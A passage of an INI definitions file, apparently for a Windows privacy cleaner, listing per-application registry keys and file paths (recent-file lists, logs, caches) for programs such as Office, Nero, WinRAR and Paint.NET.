RegKey2=HKCU\Software\Microsoft\Office\10.0\Excel\Recent Files
RegKey3=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent File List
RegKey4=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List
RegKey5=HKCU\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Web List
RegKey6=HKCU\Software\Microsoft\Office\10.0\Word\Recent Templates
RegKey7=HKCU\Software\Microsoft\Office\10.0\Common\Internet|UseRWHlinkNavigation
RegKey8=HKCU\Software\Microsoft\Office\10.0\Word\Data|Settings
RegKey9=HKCU\Software\Microsoft\Office\10.0\Access\Settings

[Office 2003]
ID=2048
LangSecRef=3021
Detect=HKCU\Software\Microsoft\Office\11.0\Common
Default=True
FileKey1=%appdata%\Microsoft\Office\Recent|*.*
RegKey1=HKCU\Software\Microsoft\Office\11.0\Excel\Recent Files
RegKey2=HKCU\Software\Microsoft\Office\11.0\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
RegKey3=HKCU\Software\Microsoft\Office\11.0\PowerPoint\Recent File List
RegKey4=HKCU\Software\Microsoft\Office\11.0\Publisher\Recent File List
RegKey5=HKCU\Software\Microsoft\Office\11.0\InfoPath\Recent File List
RegKey6=HKCU\Software\Microsoft\Office\11.0\Common\Internet\Server Cache
RegKey7=HKCU\Software\Microsoft\Office\11.0\Common\Internet|UseRWHlinkNavigation
RegKey8=HKCU\Software\Microsoft\MSPaper 11.0\Persist File Name
RegKey9=HKCU\Software\Microsoft\MSPaper 11.0\Recent File List
RegKey10=HKCU\Software\Microsoft\Office\11.0\Word\Data|Settings
RegKey11=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile1
RegKey12=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile2
RegKey13=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile3
RegKey14=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile4
RegKey15=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile5
RegKey16=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile6
RegKey17=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile7
RegKey18=HKCU\Software\Microsoft\Office\11.0\Visio\Application|LastFile8
RegKey19=HKCU\Software\Microsoft\Office\11.0\Outlook\Contact|QuickFindMRU
RegKey20=HKCU\Software\Microsoft\Office\11.0\Outlook\Contact|StripSearchMRU
RegKey21=HKCU\Software\Microsoft\Office\11.0\Outlook\Preferences|LocationMRU

[Office 2007]
ID=2049
LangSecRef=3021
Detect=HKCU\Software\Microsoft\Office\12.0\Common
Default=True
FileKey1=%appdata%\Microsoft\Office\Recent|*.*
RegKey1=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Word\Settings\Save As\File Name MRU
RegKey2=HKCU\Software\Microsoft\Office\12.0\Word\File MRU
RegKey3=HKCU\Software\Microsoft\Office\12.0\Excel\File MRU
RegKey4=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU1
RegKey5=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU2
RegKey6=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU3
RegKey7=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU4
RegKey8=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU5
RegKey9=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU6
RegKey10=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU7
RegKey11=HKCU\Software\Microsoft\Office\12.0\Access\Settings|MRU8
RegKey12=HKCU\Software\Microsoft\Office\12.0\PowerPoint\File MRU
RegKey13=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office PowerPoint\Settings\Save As\File Name MRU
RegKey14=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office InfoPath\Settings\Open\File Name MRU
RegKey15=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office InfoPath\Settings\Save As\File Name MRU
RegKey16=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Excel\Settings\Save As\File Name MRU
RegKey17=HKCU\Software\Microsoft\Office\12.0\Common\Open Find\Microsoft Office Publisher\Settings\Save As\File Name MRU
RegKey18=HKCU\Software\Microsoft\Office\12.0\Publisher\Recent File List
RegKey19=HKCU\Software\Microsoft\Office\12.0\InfoPath\Recent File List

[Installshield Developer 7.0]
ID=2050
LangSecRef=3021
Detect=HKCU\Software\InstallShield\Developer\7.0
Default=True
RegKey1=HKCU\Software\InstallShield\Developer\7.0\Recent File List

[Macromedia Flash 4.0]
ID=2051
LangSecRef=3023
Detect=HKCU\Software\Macromedia\Flash 4
Default=True
RegKey1=HKCU\Software\Macromedia\Flash 4\Recent File List

[Macromedia Flash 5.0]
ID=2052
LangSecRef=3023
Detect=HKCU\Software\Macromedia\Flash 5
Default=True
RegKey1=HKCU\Software\Macromedia\Flash 5\Recent File List

[Macromedia Flash MX]
ID=2053
LangSecRef=3023
Detect=HKCU\Software\Macromedia\Flash 6
Default=True
RegKey1=HKCU\Software\Macromedia\Flash 6\Recent File List

[Macromedia Flash MX 2004]
ID=2054
LangSecRef=3023
Detect=HKCU\Software\Macromedia\Flash 7
Default=True
RegKey1=HKCU\Software\Macromedia\Flash 7\Recent File List

[Adobe Flash Player]
ID=2055
LangSecRef=3023
Detect=HKCR\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}
Default=True
SpecialKey1=N_FLASH_COOKIES

[Macromedia Homesite 5.0]
ID=2056
LangSecRef=3021
Detect=HKCU\Software\Macromedia\HomeSite5
Default=True
RegKey1=HKCU\Software\Macromedia\HomeSite5\RecentFiles

[Macromedia Fireworks 6.0]
ID=2057
LangSecRef=3021
Default=True
Detect=HKCU\Software\Macromedia\Firework 6
RegKey1=HKCU\Software\Macromedia\Firework 6\Recent File List

[Macromedia Dreamweaver MX]
ID=2058
LangSecRef=3021
Default=True
Detect=HKCU\Software\Macromedia\Dreamweaver MX 2004
RegKey1=HKCU\Software\Macromedia\Dreamweaver MX 2004\Recent File List

[Ulead Smart Saver Pro 3.0]
ID=2059
LangSecRef=3023
Detect=HKCU\Software\Ulead Systems\Ulead SmartSaver Pro\3.0
Default=True
RegKey1=HKCU\Software\Ulead Systems\Ulead SmartSaver Pro\3.0\Recent File List

[Norton AntiVirus]
ID=2060
LangSecRef=3024
Detect=HKLM\SOFTWARE\Symantec\Norton AntiVirus NT\Install\7.50
Default=True
FileKey1=%commonappdata%\Symantec\Norton AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey2=%localappdata%\Symantec\Norton AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey3=%commonappdata%\Symantec\LiveUpdate\Downloads|*.*

[Symantec AntiVirus]
ID=2061
LangSecRef=3024
Detect=HKLM\SOFTWARE\Symantec\Symantec AntiVirus\Install\7.50
Default=True
FileKey1=%commonappdata%\Symantec\Symantec AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey2=%localappdata%\Symantec\Symantec AntiVirus Corporate Edition\7.5\Logs|*.log
FileKey3=%commonappdata%\Symantec\LiveUpdate\Downloads|*.*

[MS Snapshot Viewer]
ID=2062
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Snapshot Viewer
Default=True
RegKey1=HKCU\Software\Microsoft\Snapshot Viewer\Recent File List

[Remote Desktop]
ID=2063
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Terminal Server Client
Default=True
FileKey1=%localappdata%\Microsoft\Terminal Server Client\Cache|*.*
RegKey1=HKCU\Software\Microsoft\Terminal Server Client\Default

[MS Management Console]
ID=2064
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Microsoft Management Console\Recent File List
Default=True
RegKey1=HKCU\Software\Microsoft\Microsoft Management Console\Recent File List

[MS Wordpad]
ID=2065
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad
Default=True
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List

[MS Paint]
ID=2066
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint
Default=True
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List

[MS Photo Editor]
ID=2067
LangSecRef=3025
Detect=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor
Default=True 
RegKey1=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile1
RegKey2=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile2
RegKey3=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile3
RegKey4=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastFile4
RegKey5=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType1
RegKey6=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType2
RegKey7=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType3
RegKey8=HKCU\Software\Microsoft\Photo Editor\3.0\Microsoft Photo Editor|LastType4

[Nero Burning ROM]
ID=2068
LangSecRef=3021
Detect=HKCU\Software\ahead\Nero - Burning Rom
Default=True
RegKey1=HKCU\Software\ahead\Nero - Burning Rom\Settings|BrowserDir
RegKey2=HKCU\Software\ahead\Nero - Burning Rom\Settings|ImageDir
RegKey3=HKCU\Software\ahead\Nero - Burning Rom\Settings|WorkingDir
RegKey4=HKLM\Software\Ahead\Nero - Burning Rom\Settings|ImageDir
RegKey5=HKLM\Software\Ahead\Nero - Burning Rom\Settings|BootImageDir
RegKey6=HKCU\Software\Ahead\Nero - Burning Rom\Recent File List
RegKey7=HKCU\Software\Ahead\Cover Designer\Recent File List
RegKey8=HKCU\Software\Ahead\Nero Wave Editor\Recent File List
FileKey1=%ProgramFiles%\Ahead\Nero|NeroHistory.log

[Nero Burning ROM 9]
ID=2142
LangSecRef=3021
Detect=HKCU\Software\Nero\Nero 9
Default=True
RegKey1=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|BrowserDir
RegKey2=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|ImageDir
RegKey3=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|WorkingDir
RegKey4=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|ImageDir
RegKey5=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Settings|BootImageDir
RegKey6=HKCU\Software\Nero\Nero 9\Nero Burning ROM\Recent File List
FileKey1=%appdata%\Nero\Nero 9\Nero Burning ROM|*.log

[WinAce 2.0]
ID=2069
LangSecRef=3024
Detect=HKCU\Software\e-merge\WinAce\2.0
Default=True
RegKey1=HKCU\Software\e-merge\WinAce\2.0\Favorites
RegKey2=HKCU\Software\e-merge\WinAce\2.0\MRU Items

[SpyBot Search and Destroy]
ID=2070
LangSecRef=3024
Detect=HKCU\Software\Safer Networking Limited\SpybotSnD
Default=True
FileKey1=%commonappdata%\Spybot - Search & Destroy\Logs|*.*
FileKey2=%ProgramFiles%\Spybot - Search & Destroy|advdebug.txt
FileKey3=%commonappdata%\Spybot - Search & Destroy|Statistics.ini
FileKey4=%windir%\All Users\Application Data\Spybot - Search & Destroy\Logs|*.*
FileKey5=%windir%\All Users\Application Data\Spybot - Search & Destroy|Statistics.ini
FileKey6=%commonappdata%\Spybot - Search & Destroy\Backups|*.log

[Ad-Aware SE Personal]
ID=2071
LangSecRef=3024
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Personal\Ad-Aware.exe
Default=True
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Personal|defs.ref.old
FileKey2=%appdata%\Lavasoft\Ad-Aware\Logs|*.txt

[Ad-Aware SE Professional]
ID=2072
LangSecRef=3024
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe
Default=True
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Professional|defs.ref.old
FileKey2=%appdata%\Lavasoft\Ad-Aware\Logs|*.txt

[Ad-Aware SE Plus]
ID=2073
LangSecRef=3024
DetectFile=%ProgramFiles%\Lavasoft\Ad-Aware SE Plus\Ad-Aware.exe
Default=True
FileKey1=%ProgramFiles%\Lavasoft\Ad-Aware SE Plus|defs.ref.old
FileKey2=%appdata%\Lavasoft\Ad-Aware\Logs|*.txt

[Webroot SpySweeper]
ID=2074
LangSecRef=3024
Detect=HKCU\Software\Webroot\SpySweeper
FileKey1=%ProgramFiles%\Webroot\Spy Sweeper\Temp|*.*
FileKey2=%appdata%\Webroot\Spy Sweeper\Logs|*Log.txt

[Driver Cleaner Pro]
ID=2075
LangSecRef=3024
DetectFile=%ProgramFiles%\Driver Cleaner Pro\DCleaner.exe
Default=True
FileKey1=%ProgramFiles%\Driver Cleaner Pro\Log|*.log

[Kazaa (Search History)]
ID=2076
LangSecRef=3022
Detect=HKCU\Software\Kazaa
Default=True
RegKey1=HKCU\Software\Kazaa\Search

[Netscape Navigator 4.x]
ID=2077
LangSecRef=3022
Detect=HKCU\Software\Netscape\Netscape Navigator\Main
Default=True
FileKey1=%ProgramFiles%\Netscape\Users\default|netscape.hst
FileKey2=%ProgramFiles%\Netscape\Users\default|cookies.txt
FileKey3=%ProgramFiles%\Netscape\Users\default\cache|*.*

[Microsoft Visual Studio 6.0]
ID=2078
LangSecRef=3021
Detect=HKCU\Software\Microsoft\VisualStudio\6.0
Default=True
RegKey1=HKCU\Software\Microsoft\VisualStudio\6.0\FileMRUList
RegKey2=HKCU\Software\Microsoft\VisualStudio\6.0\MenuMRUList
RegKey3=HKCU\Software\Microsoft\VisualStudio\6.0\ProjectMRUList
RegKey4=HKCU\Software\Microsoft\Visual Basic\6.0\RecentFiles

[Axialis IconWorkshop]
ID=2079
LangSecRef=3023
Detect=HKCU\Software\Axialis\IconWorkshop
Default=True
RegKey1=HKCU\Software\Axialis\IconWorkshop\Recent File List
RegKey2=HKCU\Software\Axialis\IconWorkshop\Axialis Recent Files
RegKey3=HKCU\Software\Axialis\IconWorkshop\CoolBarList
FileKey1=%appdata%\Axialis\Temporary Preview Files|*.*|RECURSE

[eMule (Search History)]
ID=2080
LangSecRef=3022
Detect=HKCU\Software\eMule
Default=True
FileKey1=%ProgramFiles%\eMule\config|AC_SearchStrings.dat

[eMule (File Hashes)]
ID=2081
LangSecRef=3022
Detect=HKCU\Software\eMule
Default=False
FileKey1=%ProgramFiles%\eMule\config|known.met
FileKey2=%ProgramFiles%\eMule\config|known2.met

[WinISO]
ID=2082
LangSecRef=3024
Detect=HKLM\Software\WinISO
Default=True
RegKey1=HKLM\Software\WinISO\Reopen

[IsoBuster]
ID=2083
LangSecRef=3021
Detect=HKCU\Software\Smart Projects\IsoBuster
Default=True
RegKey1=HKCU\Software\Smart Projects\IsoBuster|ImageFilePath

[Media Player Classic]
ID=2084
LangSecRef=3023
Detect=HKCU\Software\Gabest\Media Player Classic
Default=True
RegKey1=HKCU\Software\Gabest\Media Player Classic\Recent File List
RegKey2=HKCU\Software\Gabest\Media Player Classic\Recent Dub List
RegKey3=HKCU\Software\Gabest\Media Player Classic\Capture|FileName

[BSPlayer]
ID=2085
LangSecRef=3023
Detect=HKCU\Software\BST\bsplayer
Default=True
RegKey1=HKCU\Software\BST\bsplayer|File0
RegKey2=HKCU\Software\BST\bsplayer|File1
RegKey3=HKCU\Software\BST\bsplayer|File2
RegKey4=HKCU\Software\BST\bsplayer|File3
RegKey5=HKCU\Software\BST\bsplayer|File4
RegKey6=HKCU\Software\BST\bsplayer|File5
RegKey7=HKCU\Software\BST\bsplayer|File6
RegKey8=HKCU\Software\BST\bsplayer|File7
RegKey9=HKCU\Software\BST\bsplayer|File8
RegKey10=HKCU\Software\BST\bsplayer|File9

[Sound Forge 6.0]
ID=2086
LangSecRef=3022
Detect=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics
Default=True
RegKey1=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30110
RegKey2=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30111
RegKey3=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30112
RegKey4=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30113
RegKey5=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30114
RegKey6=HKCU\Software\Sonic Foundry\Sound Forge\6.0\Metrics|S30115

[Windows Live Messenger]
ID=2087
LangSecRef=3022
Detect=HKCU\Software\Microsoft\MSNMessenger\PerPassportSettings
Default=True
RegKey1=HKCU\Software\Microsoft\MessengerService\ListCache\.NET Messenger Service
FileKey1=%appdata%\Microsoft\MSN Messenger|*.sqm|RECURSE

[WinZip]
ID=2088
LangSecRef=3024
Detect=HKCU\Software\Nico Mak Computing\WinZip
Default=True
RegKey1=HKCU\Software\Nico Mak Computing\WinZip\filemenu
RegKey2=HKCU\Software\Nico Mak Computing\WinZip\extract
RegKey3=HKCU\Software\Nico Mak Computing\WinZip\directories|DefDir
RegKey4=HKCU\Software\Nico Mak Computing\WinZip\directories|ExtractTo
RegKey5=HKCU\Software\Nico Mak Computing\WinZip\directories|gzAddDir
RegKey6=HKCU\Software\Nico Mak Computing\WinZip\directories|zDefDir
RegKey7=HKCU\Software\Nico Mak Computing\WinZip\directories|AddDir
RegKey8=HKCU\Software\Nico Mak Computing\WinZip\directories|gzExtractTo
RegKey9=HKCU\Software\Nico Mak Computing\WinZip\rrs\Opened

[WinRAR]
ID=2089
LangSecRef=3024
Detect=HKCU\Software\WinRAR
Default=True
RegKey1=HKCU\Software\WinRAR\ArcHistory
RegKey2=HKCU\Software\WinRAR\General|LastFolder
RegKey3=HKCU\Software\WinRAR\DialogEditHistory\Arcname
RegKey4=HKCU\Software\WinRAR\DialogEditHistory\ExtrPath

[7-Zip]
ID=2090
LangSecRef=3024
Default=True
Detect=HKCU\SOFTWARE\7-ZIP\
RegKey1=HKCU\SOFTWARE\7-ZIP\Compression\ArcHistory
RegKey2=HKCU\SOFTWARE\7-ZIP\Extraction\PathHistory
RegKey3=HKCU\Software\7-Zip\FM|CopyHistory
RegKey4=HKCU\Software\7-Zip\FM|FolderHistory
RegKey5=HKCU\Software\7-Zip\FM|PanelPath0

[PowerArchiver]
ID=2091
LangSecRef=3024
Detect=HKCU\Software\PowerArchiver
Default=True
RegKey1=HKCU\Software\PowerArchiver\Files|Active_File1
RegKey2=HKCU\Software\PowerArchiver\Files|Active_File2
RegKey3=HKCU\Software\PowerArchiver\Files|Active_File3
RegKey4=HKCU\Software\PowerArchiver\Files|Active_File4
RegKey5=HKCU\Software\PowerArchiver\Files|Active_File5
RegKey6=HKCU\Software\PowerArchiver\Files|Extract1
RegKey7=HKCU\Software\PowerArchiver\Files|Extract2
RegKey8=HKCU\Software\PowerArchiver\Files|Extract3
RegKey9=HKCU\Software\PowerArchiver\Files|Extract4
RegKey10=HKCU\Software\PowerArchiver\Files|Extract5
RegKey11=HKCU\Software\PowerArchiver\Files|Last open dir
RegKey12=HKCU\Software\PowerArchiver\Files|Last backup dir
RegKey13=HKCU\Software\PowerArchiver\Files|Last add dir

[ZipMagic]
ID=2092
LangSecRef=3024
Default=True
Detect=HKCU\Software\Mijenix\ZipMagic
RegKey1=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Recent
RegKey2=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Archive Manager\UnZip To
RegKey3=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\UnZip To
RegKey4=HKCU\Software\Mijenix\ZipMagic\CurrentVersion\Zip To

[PicoZip]
ID=2093
LangSecRef=3024
Detect=HKCU\Software\PicoZip
Default=True
RegKey1=HKCU\Software\PicoZip\MRU Items
RegKey2=HKCU\Software\PicoZip\MRUExtract

[Sun Java]
ID=2094
LangSecRef=3022
Detect=HKLM\SOFTWARE\JavaSoft\Java Plug-in
Default=True
FileKey1=%appdata%\Sun\Java\Deployment\cache|*.*|RECURSE
FileKey2=%appdata%\Sun\Java\Deployment\javaws\cache|*.*|RECURSE

[FreshDownload]
ID=2095
LangSecRef=3022
Detect=HKCU\Software\FreshDevices\FreshDownload
Default=True
RegKey1=HKCU\Software\FreshDevices\FreshDownload\History

[Windows Movie Maker]
ID=2096
LangSecRef=3023
Detect=HKCU\Software\Microsoft\MovieMaker
Default=True
FileKey1=%localappdata%\Microsoft\Movie Maker|MEDIATAB0.DAT

[TextPad]
ID=2097
LangSecRef=3021
Detect=HKCU\Software\Helios\TextPad 4
Default=True
RegKey1=HKCU\Software\Helios\TextPad 4\Recent File List
RegKey2=HKCU\Software\Helios\TextPad 4\Recent Strings

[VirtualDub]
ID=2098
LangSecRef=3023
Default=True
Detect=HKCU\Software\Freeware\VirtualDub
RegKey1=HKCU\Software\Freeware\VirtualDub\MRU List

[RegEdit]
ID=2099
LangSecRef=3025
Default=True
RegKey1=HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit|LastKey

[AceHTML 5]
ID=2100
LangSecRef=3024
Default=True
Detect=HKCU\Software\Visicom Media\AceHTML 5 Freeware
RegKey1=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last URLs
RegKey2=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Projects
RegKey3=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Open
RegKey4=HKCU\Software\Visicom Media\AceHTML 5 Freeware\Last Files

[Alcohol 120%]
ID=2101
LangSecRef=3024
Default=True
Detect=HKCU\Software\Alcohol Soft\Alcohol 120%
RegKey1=HKCU\Software\Alcohol Soft\Alcohol 120%\MountedMRU

[LeechGet]
ID=2102
LangSecRef=3022
Default=True
Detect=HKCU\Software\Cronosoft\LeechGet
RegKey1=HKCU\Software\Cronosoft\LeechGet\History

[GetRight]
ID=2103
LangSecRef=3022
Default=True
Detect=HKCU\Software\Headlight\GetRight\
RegKey1=HKCU\Software\Headlight\GetRight\MRU
RegKey2=HKCU\Software\Headlight\GetRight\TypedURLS
RegKey3=HKCU\Software\Headlight\GetRight\Recent File List
FileKey1=%ProgramFiles%\GetRight|GetRight.hst

[Download Accelerator Plus]
ID=2104
LangSecRef=3022
Detect=HKCU\Software\SpeedBit\Download Accelerator
Default=True
RegKey1=HKLM\SOFTWARE\SpeedBit\Download Accelerator\FileList
RegKey2=HKCU\Software\SpeedBit\Download Accelerator\HistoryCombo
RegKey3=HKCU\Software\SpeedBit\Download Accelerator\ADS\SecondMedia
FileKey1=%ProgramFiles%\DAP\Temp|*.*
FileKey2=%ProgramFiles%\DAP\Ads|*.*
FileKey3=%ProgramFiles%\DAP\Log|*.*

[Morpheus]
ID=2105
LangSecRef=3022
Default=True
Detect=HKCU\Software\Morpheus
RegKey1=HKCU\Software\Morpheus\Morpheus\Recent File List

[VNCViewer 3]
ID=2106
LangSecRef=3024
Default=True
Detect=HKCU\Software\ORL\VNCviewer
RegKey1=HKCU\Software\ORL\VNCviewer\MRU

[VNCViewer 4]
ID=2107
LangSecRef=3024
Default=True
Detect=HKCU\Software\RealVNC\VNCviewer4
RegKey1=HKCU\Software\RealVNC\VNCviewer4\MRU

[DVD Shrink]
ID=2108
LangSecRef=3023
Default=True
Detect=HKCU\Software\DVD Shrink\
RegKey1=HKCU\Software\DVD Shrink\DVD Shrink 3.2\Recent Targets
RegKey2=HKCU\Software\DVD Shrink\DVD Shrink 3.2\Recent File List
RegKey3=HKCU\Software\DVD Shrink\DVDSHRINK103\TargetFiles
RegKey4=HKCU\Software\DVD Shrink\DVDSHRINK103\SourceFolders

[Tivo Desktop]
ID=2109
LangSecRef=3023
Default=True
Detect=HKCU\SOFTWARE\TiVo\Desktop
FileKey1=%localappdata%\TiVo Desktop\Cache|*.*

[CA Anti-Virus]
ID=2110
LangSecRef=3024
Default=True
Detect=HKLM\SOFTWARE\ComputerAssociates\Anti-Virus
FileKey1=%ProgramFiles%\CA\eTrust Internet Security Suite\eTrust EZ Antivirus|*.log
FileKey2=%ProgramFiles%\CA\eTrust Internet Security Suite\eTrust EZ Antivirus|*log.txt
FileKey3=%ProgramFiles%\CA\eTrust Internet Security Suite\eTrust EZ Antivirus\ArcTemp|*.tmp
FileKey4=%commonappdata%\CA\Consumer\AV|*.tmp|RECURSE
FileKey5=%commonappdata%\CA\Consumer\AV|*.txt|RECURSE
FileKey6=%commonappdata%\CA\Consumer\CCube|*.tmp|RECURSE
FileKey7=%commonappdata%\CA\Consumer\CCube|*.txt|RECURSE
FileKey8=%commonappdata%\CA\Consumer\ISS\FeedStore|*.txt|RECURSE
FileKey9=%ProgramFiles%\CA\CA Internet Security Suite\CA Anti-Virus\ArcTemp|*.*
FileKey10=%ProgramFiles%\CA\CA Internet Security Suite\CA Anti-Virus\tmp|*.*

[ZoneAlarm (Logs)]
ID=2111
LangSecRef=3022
Detect=HKLM\SOFTWARE\Zone Labs\ZoneAlarm
Default=True
FileKey1=%windir%\Internet Logs|ZALog*.*

[Google Earth]
ID=2112
LangSecRef=3021
Detect=HKLM\SOFTWARE\Google\Google Earth Plus
Detect2=HKLM\SOFTWARE\Google\Google Earth Pro
Default=True
FileKey1=%appdata%\Google\GoogleEarth|dbcache.dat
FileKey2=%appdata%\Google\GoogleEarth|dbcache.dat.index
RegKey1=HKCU\Software\Google\Google Earth Plus\Search
RegKey2=HKCU\Software\Google\Google Earth Pro\Search

[Microsoft AntiSpyware]
ID=2113
LangSecRef=3024
DetectFile=%ProgramFiles%\Microsoft AntiSpyware\GIANTAntiSpywareMain.exe
Default=True
FileKey1=%ProgramFiles%\Microsoft AntiSpyware|errors.log
FileKey2=%ProgramFiles%\Microsoft AntiSpyware|tracksEraser.log
FileKey3=%ProgramFiles%\Microsoft AntiSpyware|cleaner.log

[PerfectDisk 7.0]
ID=2114
LangSecRef=3024
Detect=HKCU\Software\Raxco\PerfectDisk\7.0
Default=True
FileKey1=%commonappdata%\Raxco\PerfectDisk\7.0|PerfectDisk.log

[Vuze]
ID=2115
LangSecRef=3022
Detect=HKCU\Software\Azureus
Default=True
FileKey1=%appdata%\Azureus\logs|*.log
FileKey2=%appdata%\Azureus\logs\save|*.log
FileKey3=%userprofile%\Application Data\Azureus\tmp|*.*
FileKey4=%userprofile%\Application Data\Azureus|*.bak
FileKey5=%userprofile%\Application Data\Azureus|*.log
FileKey6=%userprofile%\Application Data\Azureus\active|*.bak

[CuteFTP Pro 7.0]
ID=2116
LangSecRef=3022
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 7 Professional
Default=True
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP Pro\7.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP Pro\7.0\CacheThumbs|*.*|RECURSE

[CuteFTP Home 7.0]
ID=2117
LangSecRef=3022
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 7 Home
Default=True
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP\7.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP\7.0\CacheThumbs|*.*|RECURSE

[CuteFTP Pro 8.0]
ID=2118
LangSecRef=3022
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 8 Professional
Default=True
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP Pro\8.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP Pro\8.0\CacheThumbs|*.*|RECURSE

[CuteFTP Home 8.0]
ID=2119
LangSecRef=3022
Detect=HKLM\SOFTWARE\GlobalSCAPE\CuteFTP 8 Home
Default=True
FileKey1=%localappdata%\GlobalSCAPE\CuteFTP\8.0\Cache|*.*|RECURSE
FileKey2=%localappdata%\GlobalSCAPE\CuteFTP\8.0\CacheThumbs|*.*|RECURSE

[ClamWin]
ID=2120
LangSecRef=3024
Detect=HKCU\Software\ClamWin
Default=True
FileKey1=%allusersprofile%\.clamwin\log|*.*
FileKey2=%userprofile%\.clamwin\log|*.*
FileKey3=%windir%\All Users\.clamwin\log|*.*

[Ewido Anti-Malware (Log)]
ID=2121
LangSecRef=3024
Detect=HKLM\Software\ewido
Default=True
FileKey1=%ProgramFiles%\Ewido\Security Suite|logfile.txt
FileKey2=%ProgramFiles%\Ewido Anti-Malware|logfile.txt

[AVG Anti-Spyware]
ID=2122
LangSecRef=3024
Detect=HKLM\SOFTWARE\Grisoft\AVGAntiSpyware
Default=True
FileKey1=%ProgramFiles%\Grisoft\AVG Anti-Spyware 7.5|logfile.txt

[Foxit Reader]
ID=2123
LangSecRef=3021
Detect=HKCU\Software\Foxit Software\Foxit Reader
Default=True
RegKey1=HKCU\Software\Foxit Software\Foxit Reader\Recent File List
RegKey2=HKCU\Software\Foxit Software\Foxit Reader\History

[Paint.NET]
ID=2124
LangSecRef=3021
Detect=HKCU\Software\Paint.NET
Default=True
RegKey1=HKCU\Software\Paint.NET|MRU0
RegKey2=HKCU\Software\Paint.NET|MRU1
RegKey3=HKCU\Software\Paint.NET|MRU2
RegKey4=HKCU\Software\Paint.NET|MRU3
RegKey5=HKCU\Software\Paint.NET|MRU4
RegKey6=HKCU\Software\Paint.NET|MRU5
RegKey7=HKCU\Software\Paint.NET|MRU6
RegKey8=HKCU\Software\Paint.NET|MRU7
RegKey9=HKCU\Software\Paint.NET|MRU0Thumb
RegKey10=HKCU\Software\Paint.NET|MRU1Thumb
RegKey11=HKCU\Software\Paint.NET|MRU2Thumb
RegKey12=HKCU\Software\Paint.NET|MRU3Thumb
RegKey13=HKCU\Software\Paint.NET|MRU4Thumb
